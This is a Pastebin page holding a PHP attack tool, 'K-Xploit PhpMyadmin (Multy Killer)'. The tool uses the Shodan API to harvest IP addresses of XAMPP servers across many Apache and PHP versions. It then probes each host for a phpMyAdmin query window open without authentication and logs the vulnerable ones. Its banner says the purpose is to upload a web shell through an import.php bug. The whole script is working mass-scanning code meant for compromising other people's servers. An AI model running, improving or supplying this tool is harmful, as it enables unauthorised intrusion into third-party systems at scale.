Advertisement
shor7cut

K-Xploit PhpMyadmin (Multy Killer)

Jul 25th, 2015
664
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5.  cover();
  6.  echo "\r\n--------------------------------------\r\n";
  7.  echo "[!] Pleas [ENTER] for next and CTRL+C for abort";
  8. $in = chop(fgets(STDIN));
  9. if(!$in){
  10.     cari_target();
  11. }
  12.  
  13.  
  14. function cari_target() {
  15. unlink("target_shor7cut.txt");
  16. echo "[!] Set output extension [TXT/HTML] : ";
  17. $ext = chop(fgets(STDIN));
  18. echo "\r\n";
  19. if($ext=="HTML"){
  20.     $extension = ".html";
  21. }else if($ext=="TXT"){
  22.     $extension = ".txt";
  23. }else if($ext){
  24.     quit();
  25. }if($ext==""){
  26.     quit();
  27. }
  28. $name_output = "K-exploit-".date("d-m-Y@his").$extension;
  29.  
  30.  
  31.  
  32.  
  33.     // SETTING \\
  34. $no=1;
  35. $nos=1;
  36. $success=0;
  37. $fail=0;
  38. $auth=0;
  39. $dbaru=0;
  40. $api = " ";
  41. if($api==""){
  42.     echo "[!] Ops... Get Your api in account.shodan.io\r\n";
  43.      quit();
  44. }
  45. $total_target=0;
  46. // END:SETTING \\
  47. $dork = array (
  48. 'xampp',
  49. 'xampp Apache/2.2.3',
  50. 'xampp Apache/2.2.4',
  51. 'xampp Apache/2.2.6',
  52. 'xampp Apache/2.2.8',
  53. 'xampp Apache/2.2.9',
  54. 'xampp Apache/2.2.11',
  55. 'xampp Apache/2.2.12',
  56. 'xampp Apache/2.2.14',
  57. 'xampp Apache/2.2.17',
  58. 'xampp Apache/2.2.21',
  59. 'xampp Apache/2.4.2',
  60. 'xampp Apache/2.4.3',
  61. 'xampp Apache/2.4.10',
  62. 'xampp Apache/2.4.12',
  63. 'xampp PHP/5.2.1',
  64. 'xampp PHP/5.2.2',
  65. 'xampp PHP/5.2.3',
  66. 'xampp PHP/5.2.4',
  67. 'xampp PHP/5.2.5',
  68. 'xampp PHP/5.2.6',
  69. 'xampp PHP/5.2.8',
  70. 'xampp PHP/5.2.9',
  71. 'xampp PHP/5.3.0',
  72. 'xampp PHP/5.3.1',
  73. 'xampp PHP/5.3.5',
  74. 'xampp PHP/5.3.8',
  75. 'xampp PHP/5.4.4',
  76. 'xampp PHP/5.4.7',
  77. 'xampp PHP/5.4.31',
  78. 'xampp PHP/5.5.15',
  79. 'xampp PHP/5.5.19',
  80. 'xampp PHP/5.6.3',
  81. 'xampp PHP/5.5.24',
  82. 'xampp PHP/5.6.8',
  83. 'xampp PHP/4.4.5',
  84. 'xampp PHP/4.4.6',
  85. 'xampp PHP/4.4.7',
  86. 'xampp PHP/4.4.8',
  87. 'xampp PHP/4.4.9'
  88. );
  89.  
  90. $total_dork = count($dork);
  91.  
  92.  
  93.  
  94. foreach ($dork as $dorks) {
  95.     $noms = "(".$no."/".$total_dork.")";
  96.     echo shell_exec("title Mencari Target $noms");
  97.     echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
  98.     $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  99.     $json = json_decode($get,true);
  100.  
  101. foreach ($json['matches'] as $key => $value) {
  102.  
  103.         $fp = fopen("target_shor7cut.txt", 'a+');
  104.         fwrite($fp, $value['ip_str']."|");
  105.         fclose($fp);
  106.  
  107.     } // End Foreach
  108.     $target_live = $json['total'];
  109.         if($target_live>100){
  110.             $target_live=100;
  111.         }
  112.     $total_target=$target_live+$total_target;
  113.     echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
  114.     $no++;
  115. }
  116. echo "[+] Total Target : [".$total_target."]\r\n";
  117. $buka_file = fopen("target_shor7cut.txt", "r");
  118. $baca_file = fgets($buka_file);
  119. $target = explode("|", $baca_file);
  120. echo "[+] Memulai Mencari vulnerable\r\n";
  121. echo shell_exec("title Memulai Mencari vulnerable . . . Pleas wait");
  122. loading();
  123. echo "\r\n";
  124. $start = date("d-m-Y h:i:sa");
  125. foreach ($target as $sites) {
  126.     $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
  127. echo shell_exec("title $infos");
  128. echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
  129. echo "-> Target : ".$sites."\r\n";
  130. echo "-> PhpMyadmin : ";
  131. $url = "http://$sites/phpmyadmin/querywindow.php";
  132. $phpmyn = curl_init("$url");
  133. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  134. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  135. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  136. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  137. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  138. $phpmynresult = curl_exec($phpmyn);
  139. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  140. if(preg_match($re, $phpmynresult, $matches)){
  141. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  142. echo "Not vulnerable (Auth)\r\n";
  143. $auth++;
  144. }else {
  145. echo "vulnerable\r\n";
  146.        
  147.         if($extension==".html"){
  148.             $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
  149.         }else {
  150.             $hasil_output="$url\r\n";
  151.         }
  152.        
  153.         //-----------------------------------------------------------------\\
  154.         //--- JIKA ADA TARGET YANG SAMA MAKA DATA TIDAK DI SIMPAN DI DATABASE
  155.         //--- JIKA INGIN MENGHILANGKAN FUNGSI INI SILAHKAN EDIT SENDIRI
  156.         //--- Hapus Script yang sudah saya tandai // START // END
  157.         //--- Ganti dengan Script dibawah ini
  158.         /*
  159.         $fp = fopen($name_output, 'a+');
  160.         fwrite($fp, $hasil_output);
  161.         fclose($fp);
  162.         */
  163.         //-----------------------------------------------------------------\\
  164.  
  165.         //start
  166.         $buka_file = fopen("logs_shor7cut.txt", "r");
  167.         $baca_file = fgets($buka_file);
  168.  
  169.         if(!preg_match("/$url/", $buka_file, $mat)){
  170.  
  171.         $fp = fopen($name_output, 'a+');
  172.         fwrite($fp, $hasil_output);
  173.         fclose($fp);
  174.        
  175.         $fp = fopen("logs_shor7cut.txt", 'a+');
  176.         fwrite($fp, $url)."\r\n";
  177.         fclose($fp);
  178.             echo "-> Save-DB : Telah disimpan\r\n";
  179.             $dbaru++;
  180.         }else {
  181.             echo "-> Save-DB : Sudah ada di db (logs_shor7cut.txt)\r\n";
  182.         }
  183.         //end
  184.        
  185.        
  186. $success++;
  187. }
  188. }else {
  189. echo "Not vulnerable\r\n";
  190. $fail++;
  191. }
  192. echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
  193. $nos++;
  194.  
  195. }
  196. $scan_done = "Scan Done On ".date("d-m-Y h:i:sa")." - ".$name_output;
  197. echo shell_exec("title $scan_done");
  198. echo "\r\n\n---------------------------------------\r\n";
  199. echo "              > LAPORAN AKHIR <\r\n";
  200. echo "\r\n---------------------------------------\r\n";
  201. echo "-> Total Target : ".$total_target."\r\n";
  202. echo "-> Total Success :".$success."\r\n";
  203. echo "-> Total fail :".$fail."\r\n";
  204. echo "-> Total Auth :".$auth."\r\n";
  205. echo "-> Total Target Baru :".$dbaru."\r\n";
  206. echo "-> Output File :".$name_output."\r\n";
  207. echo "-> Start Scan : ".$start."\r\n";
  208. echo "-> End Scan : ".date("d-m-Y h:i:sa");
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218. } // akhir fungsi
  219.  
  220. function loading() {
  221.     echo "-> Pleas wait ";
  222. for ($i=0; $i <3; $i++) {
  223.         echo ".";
  224.         sleep(1);
  225.         echo " ";
  226.         sleep(1);
  227. }   echo "\r\n";
  228.     }
  229.  
  230.  
  231. function cover() {
  232. $shor7cut.="       .---.                                             \r\n";
  233. $shor7cut.="       |---|                                             \r\n";
  234. $shor7cut.="       |---|                                             \r\n";
  235. $shor7cut.="       |---|    > K-Xploit PhpMyadmin (Multy Killer) <   \r\n";
  236. $shor7cut.="   .---^ - ^---.                                         \r\n";
  237. $shor7cut.="   :___________: Code By Shor7cut (Bug7sec Team)         \r\n";
  238. $shor7cut.="      |  |//|                                            \r\n";
  239. $shor7cut.="      |  |//| [DESCRIPTION]                              \r\n";
  240. $shor7cut.="      |  |//| Looking for Target using shodan            \r\n";
  241. $shor7cut.="      |  |//| Then proceed to search                     \r\n";
  242. $shor7cut.="      |  |.-| Phpmyadmin which has the bug import.php    \r\n";
  243. $shor7cut.="      |.-'**| So that we can upload shell                \r\n";
  244. $shor7cut.="       \***/  Through the bug import.php                 \r\n";
  245. $shor7cut.="        \*/                                              \r\n";
  246. $shor7cut.="         V   Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM    \r\n";
  247. $shor7cut.="             Yogyakarta Black Hat | Suram-Crew \r\n";
  248. echo $shor7cut;
  249. }  
  250. ?>
Advertisement
RAW Paste Data Copied
Advertisement